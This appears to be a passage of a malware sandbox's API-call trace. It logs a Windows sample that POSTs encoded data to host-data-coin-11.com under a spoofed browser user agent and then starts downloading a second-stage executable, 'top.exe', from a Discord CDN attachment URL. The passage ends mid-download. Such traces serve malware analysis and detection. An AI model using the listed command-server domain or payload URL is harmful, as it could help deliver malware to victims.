[0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x462e5f71 [0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4e0ae4a0 [0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x52b0cfb1 [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xeff34e [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x52c1303a [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x82556a [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5947b329 [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x603543b9 [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x76d5fe4f [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x27c6e0d1 [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x746636bd [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x45c95f41 [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4d63b42b [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x79244162 [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x61ea5273 [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x14ea0d6c [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xbc2a0e9 [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x42541630 [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7123a760 [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x23019d23 [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5ddd392b [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x203904ba [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3f89611b [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x78ab1247 [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x707a19a9 [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x62528643 [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x53d5930d [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6196de61 [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xefd54b3 [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x43cb5e91 [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x38832709 [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3bb0eedb [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x14c0bbd1 [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x12ea3b7b [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xb4a77a3 [0107.246] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5eda7076 [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xeebba5b [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6fbc1111 [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4034f4d8 [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2e6a9ba4 [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2f1cbff0 [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x751f5e49 [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x161df9ec [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x311fda9a [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6428ec86 [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x19a00554 [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xc3e0613 [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x23f405df [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3eb8a70c [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x51e2c536 [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2eb18a9b [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x515d4c56 [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x170440e3 [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x29813821 [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3eed0001 [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x44f62b2d [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x774a2e1f [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x45bc4f11 [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x17c758b4 [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4feb82eb [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6e14f098 [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x554e17af [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5ddd392b [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5fd6bef [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3002feee [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x55f793df [0107.247] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x63eef08a [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5f29fc8d [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x21a029ae [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7e180d34 [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xee49122 [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3a88c45b [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x204df8b7 [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x478ea99e [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x429cdbab [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2b7d3e2e [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x10ad060a [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xb7e3af4 [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3638b8ef [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4ae21e4e [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x61a37d02 [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x282520ac [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7a14a1a1 [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xe2f1b9d [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xa82b6a2 [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x142e68f5 [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x61b36fca [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x52808572 [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6aa8e914 [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x251a2bbc [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x70f34d41 [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x77f8129d [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1cc8c185 [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2fdefdde [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5842ac1f [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2c50af60 [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5143dc83 [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6c12d8fa [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4995d3de [0107.248] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x57b48ce4 [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x59e31a95 [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x783900e0 [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2e08213d [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x63e800df [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1193b33 [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xa04e2c [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x73edcb5d [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x74979a09 [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x66d5e124 [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1fca1301 [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6dd63714 [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x45ca422b [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x31dba62 [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4ae2f3ad [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5035fc18 [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4bda919c [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3bc01190 [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4efd5e11 [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3bb35988 [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xeb4c489 [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x50d02669 [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3ac90b08 [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x298aca0 [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7131a081 [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2aa1c2c1 [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x22bd1183 [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x33657cc [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x78fd03f3 [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x383fbff2 [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x17fd0034 [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x72300b2b [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x473c6bad [0107.249] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x511e861e [0107.250] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x408b2e59 [0107.250] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x789f36ad [0107.250] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3e0e21ec [0107.250] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x32f69db4 [0107.250] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x10bd49c8 [0107.250] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1afba8ce [0107.250] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3edbb71b [0107.250] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4d6f291e [0107.250] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x26b0f690 [0107.250] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x43caa9ad [0107.250] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x12e) returned 0x7f12440 [0107.250] lstrcatA (in: lpString1="", lpString2="4BCD659AD8F347B5B451918CD891C8238443A5AF" | out: lpString1="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned="4BCD659AD8F347B5B451918CD891C8238443A5AF" [0107.250] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0107.250] lstrcatA (in: lpString1="", lpString2="pub3" | out: lpString1="pub3") returned="pub3" [0107.250] lstrcatA (in: lpString1="", lpString2=",m79Q\">Z>_?lwO2Vgt-K_RoKD=r@)=U,A8=.$B$E-s\"F$uo!Asg$`&4%cd&ddMumct\\l8y\"HwxSE'b,RX,vH5`!jg'$HufbtTTh&>vnVz(_\"`E'wN;A!CHxSQ6'$Rl<0VIR-^HR#x+4o5O@N!<'+aV3-w\\&avC7#u2n>W@iB:EjGDm,C97F[2,e'\"&hoRi=T658,]o['J%%h" | out: lpString1=",m79Q\">Z>_?lwO2Vgt-K_RoKD=r@)=U,A8=.$B$E-s\"F$uo!Asg$`&4%cd&ddMumct\\l8y\"HwxSE'b,RX,vH5`!jg'$HufbtTTh&>vnVz(_\"`E'wN;A!CHxSQ6'$Rl<0VIR-^HR#x+4o5O@N!<'+aV3-w\\&avC7#u2n>W@iB:EjGDm,C97F[2,e'\"&hoRi=T658,]o['J%%h") returned=",m79Q\">Z>_?lwO2Vgt-K_RoKD=r@)=U,A8=.$B$E-s\"F$uo!Asg$`&4%cd&ddMumct\\l8y\"HwxSE'b,RX,vH5`!jg'$HufbtTTh&>vnVz(_\"`E'wN;A!CHxSQ6'$Rl<0VIR-^HR#x+4o5O@N!<'+aV3-w\\&avC7#u2n>W@iB:EjGDm,C97F[2,e'\"&hoRi=T658,]o['J%%h" [0107.250] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x10c) returned 0x7f12580 [0107.250] lstrlenA (lpString="http://host-data-coin-11.com/") returned 29 [0107.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7f12300, cbMultiByte=30, lpWideCharStr=0x7f12580, cchWideChar=60 | out: lpWideCharStr="http://host-data-coin-11.com/") returned 30 [0107.250] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x7d6f7b8 | out: pProxyConfig=0x7d6f7b8) returned 1 [0107.281] WinHttpOpen (pszAgentW="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x3fb03a0 [0107.281] WinHttpCrackUrl (in: pwszUrl="http://host-data-coin-11.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x7d6f870 | out: lpUrlComponents=0x7d6f870) returned 1 [0107.281] WinHttpConnect (hSession=0x3fb03a0, pswzServerName="host-data-coin-11.com", nServerPort=0x50, dwReserved=0x0) returned 0x3f83fd0 [0107.282] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x12) returned 0x7f126a0 [0107.282] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x68) returned 0x7f126c0 [0107.282] WinHttpOpenRequest (hConnect=0x3f83fd0, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x71cad70 [0107.282] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x4e) returned 0x7f12730 [0107.282] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x10d) returned 0x7f12790 [0107.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5e4932a0 [0107.282] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x12) returned 0x7f128b0 [0107.282] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x17) returned 0x7f128d0 [0107.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x28784ba4 [0107.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x13b2ecf9 [0107.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x38f566d5 [0107.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x739ef6d3 [0107.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7f9bbb6d [0107.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3461dc17 [0107.282] wsprintfW (in: param_1=0x7f12790, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://cqpsr.net/") returned 39 [0107.282] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f128d0) returned 0x17 [0107.282] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f128d0) returned 1 [0107.282] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f128b0) returned 0x12 [0107.282] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f128b0) returned 1 [0107.282] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12730) returned 0x4e [0107.283] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12730) returned 1 [0107.283] WinHttpAddRequestHeaders (hRequest=0x71cad70, pwszHeaders="Accept: */*\r\nReferer: http://cqpsr.net/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0107.284] WinHttpSendRequest (hRequest=0x71cad70, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x7f12440*, dwOptionalLength=0x125, dwTotalLength=0x125, dwContext=0x0) returned 1 [0107.479] WinHttpReceiveResponse (hRequest=0x71cad70, lpReserved=0x0) returned 1 [0107.479] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x2800) returned 0x7f128b0 [0107.479] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f128b0, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f928 | out: lpBuffer=0x7f128b0*, lpdwNumberOfBytesRead=0x7d6f928*=0x60) returned 1 [0107.480] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f128b0, Size=0x5000) returned 0x7f128b0 [0107.480] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f12910, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f928 | out: lpBuffer=0x7f12910*, lpdwNumberOfBytesRead=0x7d6f928*=0x0) returned 1 [0107.480] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x3970000 [0107.482] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f128b0) returned 1 [0107.482] WinHttpCloseHandle (hInternet=0x71cad70) returned 1 [0107.482] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12790) returned 0x10d [0107.482] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12790) returned 1 [0107.482] WinHttpCloseHandle (hInternet=0x3f83fd0) returned 1 [0107.482] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f126c0) returned 0x68 [0107.483] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f126c0) returned 1 [0107.483] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f126a0) returned 0x12 [0107.483] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f126a0) returned 1 [0107.483] WinHttpCloseHandle (hInternet=0x3fb03a0) returned 1 [0107.483] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12580) returned 0x10c [0107.483] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12580) returned 1 [0107.483] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12350) returned 0xdf [0107.484] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12350) returned 1 [0107.484] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12440) returned 0x12e [0107.484] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12440) returned 1 [0107.484] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x1008) returned 0x7f12350 [0107.484] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x1008) returned 0x7f13360 [0107.484] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x13) returned 0x7f14370 [0107.484] lstrlenA (lpString="Location: https://cdn.discordapp.com/attachments/925145879403446292/925145901322879006/top.exe") returned 94 [0107.484] lstrlenA (lpString="Location:") returned 9 [0107.484] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x6a) returned 0x7f14390 [0107.484] wsprintfA (in: param_1=0x7f14390, param_2="%s" | out: param_1="https://cdn.discordapp.com/attachments/925145879403446292/925145901322879006/top.exe") returned 84 [0107.484] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x10c) returned 0x7f14410 [0107.484] lstrlenA (lpString="https://cdn.discordapp.com/attachments/925145879403446292/925145901322879006/top.exe") returned 84 [0107.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7f14390, cbMultiByte=85, lpWideCharStr=0x7f14410, cchWideChar=170 | out: lpWideCharStr="https://cdn.discordapp.com/attachments/925145879403446292/925145901322879006/top.exe") returned 85 [0107.484] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x7d6f6e8 | out: pProxyConfig=0x7d6f6e8) returned 1 [0107.497] WinHttpOpen (pszAgentW="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x3fb03a0 [0107.497] WinHttpCrackUrl (in: pwszUrl="https://cdn.discordapp.com/attachments/925145879403446292/925145901322879006/top.exe", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x7d6f7a0 | out: lpUrlComponents=0x7d6f7a0) returned 1 [0107.497] WinHttpConnect (hSession=0x3fb03a0, pswzServerName="cdn.discordapp.com", nServerPort=0x1bb, dwReserved=0x0) returned 0x3f83fd0 [0107.497] WinHttpOpenRequest (hConnect=0x3f83fd0, pwszVerb=0x0, pwszObjectName="/attachments/925145879403446292/925145901322879006/top.exe", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x71cad70 [0107.497] WinHttpSetOption (hInternet=0x71cad70, dwOption=0x1f, lpBuffer=0x7d6f760, dwBufferLength=0x4) returned 1 [0107.498] WinHttpSendRequest (hRequest=0x71cad70, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1 [0108.874] WinHttpReceiveResponse (hRequest=0x71cad70, lpReserved=0x0) returned 1 [0108.874] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x2800) returned 0x7f14530 [0108.874] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f14530, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f14530*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.876] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x5000) returned 0x7f14530 [0108.876] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f16d30, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f16d30*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.877] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0x7800) returned 0x7f14530 [0108.877] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f19530, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f19530*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.878] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14530, Size=0xa000) returned 0x7f1bd40 [0108.880] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f23540, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x7f23540*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0108.881] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f1bd40, Size=0xc800) returned 0x7f25d50 [0108.884] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f2fd50, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: 